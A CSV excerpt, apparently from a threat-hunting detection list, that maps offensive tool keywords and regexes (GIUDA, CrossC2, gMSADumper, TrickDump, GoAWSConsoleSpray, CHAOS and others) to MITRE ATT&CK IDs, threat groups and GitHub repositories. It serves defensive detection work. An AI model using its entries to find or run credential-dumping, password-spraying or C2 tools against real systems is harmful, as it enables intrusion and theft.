"*Git-Scanner*",".{0,1000}Git\-Scanner.{0,1000}","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Reconnaissance","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","N/A","4","352","91","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z","46448"
"*GIUDA* -askluids*",".{0,1000}GIUDA.{0,1000}\s\-askluids.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","46449"
"*GIUDA-main.zip*",".{0,1000}GIUDA\-main\.zip.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","1","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","46450"
"*give_dcsync.py*",".{0,1000}give_dcsync\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","46451"
"*glassfish_war_upload_xsrf*",".{0,1000}glassfish_war_upload_xsrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","46454"
"*glebarez/padre*",".{0,1000}glebarez\/padre.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","46456"
"*glit org -*",".{0,1000}glit\sorg\s\-.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46457"
"*glit repo *",".{0,1000}glit\srepo\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46458"
"*glit user *",".{0,1000}glit\suser\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46459"
"*glit.exe org*",".{0,1000}glit\.exe\sorg.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46460"
"*glit.exe repo*",".{0,1000}glit\.exe\srepo.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46461"
"*glit.exe user*",".{0,1000}glit\.exe\suser.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46462"
"*glit-i686-pc-windows-msvc*",".{0,1000}glit\-i686\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46463"
"*glit-main.zip*",".{0,1000}glit\-main\.zip.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46464"
"*glit-x86_64-apple-darwin*",".{0,1000}glit\-x86_64\-apple\-darwin.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46465"
"*glit-x86_64-pc-windows-msvc*",".{0,1000}glit\-x86_64\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46466"
"*glit-x86_64-unknown-linux-gnu*",".{0,1000}glit\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","46467"
"*globaleaks/Tor2web*",".{0,1000}globaleaks\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","46470"
"*GlobalUnProtect.exe*",".{0,1000}GlobalUnProtect\.exe.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","1","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","46471"
"*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","46472"
"*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","46473"
"*GludXhsb2NhbGhvc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nl82NDE2MTM0ODExNjQ4NTAxMzg2MDQzMzky*",".{0,1000}GludXhsb2NhbGhvc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nc3Q2LjUuMC1rYWxpMi1hbWQ2NHg4Nl82NDE2MTM0ODExNjQ4NTAxMzg2MDQzMzky.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","46474"
"*GmailC2.csproj*",".{0,1000}GmailC2\.csproj.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","46475"
"*gmsa_dump*",".{0,1000}gmsa_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","46476"
"*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46477"
"*gMSADumper.py*",".{0,1000}gMSADumper\.py.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","N/A","3","274","51","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z","46478"
"*GMSAPasswordReader.exe --*",".{0,1000}GMSAPasswordReader\.exe\s\-\-.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","46479"
"*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","46480"
"*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46481"
"*GMSAPasswordReader.exe*",".{0,1000}GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","46482"
"*GMSAPasswordReader-master*",".{0,1000}GMSAPasswordReader\-master.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","46483"
"*GMShellcode*",".{0,1000}GMShellcode.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46484"
"*GMShellcode.*",".{0,1000}GMShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46485"
"*GMShellcode\*",".{0,1000}GMShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","46486"
"*go build cmd/npc/npc.go*",".{0,1000}go\sbuild\scmd\/npc\/npc\.go.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","46488"
"*go build cmd/nps/nps.go*",".{0,1000}go\sbuild\scmd\/nps\/nps\.go.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","46489"
"*go build Ivy.go*",".{0,1000}go\sbuild\sIvy\.go.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","N/A","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","46490"
"*go build lock.go && go build shock.go && go build barrel.go*",".{0,1000}go\sbuild\slock\.go\s\&\&\sgo\sbuild\sshock\.go\s\&\&\sgo\sbuild\sbarrel\.go.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","46491"
"*go get -u *traitor/cmd/traitor*",".{0,1000}go\sget\s\-u\s.{0,1000}traitor\/cmd\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","46492"
"*go install mvdan.cc/garble@latest*",".{0,1000}go\sinstall\smvdan\.cc\/garble\@latest.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","garble binary obfuscation","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","46493"
"*go run ./cmd/reverst/*",".{0,1000}go\srun\s\.\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","46494"
"*go run cmd/chaos/main.go*",".{0,1000}go\srun\scmd\/chaos\/main\.go.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","46495"
"*go run lock.go -o disk*",".{0,1000}go\srun\slock\.go\s\-o\sdisk.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","46496"
"*go run poc.go check -t http://*:8080 -u Admin*",".{0,1000}go\srun\spoc\.go\scheck\s\-t\shttp\:\/\/.{0,1000}\:8080\s\-u\sAdmin.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z","46497"
"*go run scannerPort.go*",".{0,1000}go\srun\sscannerPort\.go.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","0","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","46498"
"*go run shock.go -o knwondlls*",".{0,1000}go\srun\sshock\.go\s\-o\sknwondlls.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","46499"
"*go thru each line in passwords.lst*",".{0,1000}go\sthru\seach\sline\sin\spasswords\.lst.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","46500"
"*Go, go ADeleginator!*",".{0,1000}Go,\sgo\sADeleginator!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","46501"
"*go.flipt.io/reverst/*",".{0,1000}go\.flipt\.io\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","46502"
"*go.flipt.io/reverst/*",".{0,1000}go\.flipt\.io\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","46503"
"*go_shellcode_encode.py*",".{0,1000}go_shellcode_encode\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","46504"
"*GoAWSConsoleSpray -*",".{0,1000}GoAWSConsoleSpray\s\-.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46505"
"*GoAWSConsoleSpray.exe*",".{0,1000}GoAWSConsoleSpray\.exe.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46506"
"*GoAWSConsoleSpray@latest*",".{0,1000}GoAWSConsoleSpray\@latest.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46507"
"*GoAWSConsoleSpray-master.zip*",".{0,1000}GoAWSConsoleSpray\-master\.zip.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","46508"
"*gobfuscate*",".{0,1000}gobfuscate.{0,1000}","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","N/A","10","1507","162","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z","46509"
"*gobuster dir *",".{0,1000}gobuster\sdir\s.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","46510"
"*gobuster dir -w *",".{0,1000}gobuster\sdir\s\-w\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46511"
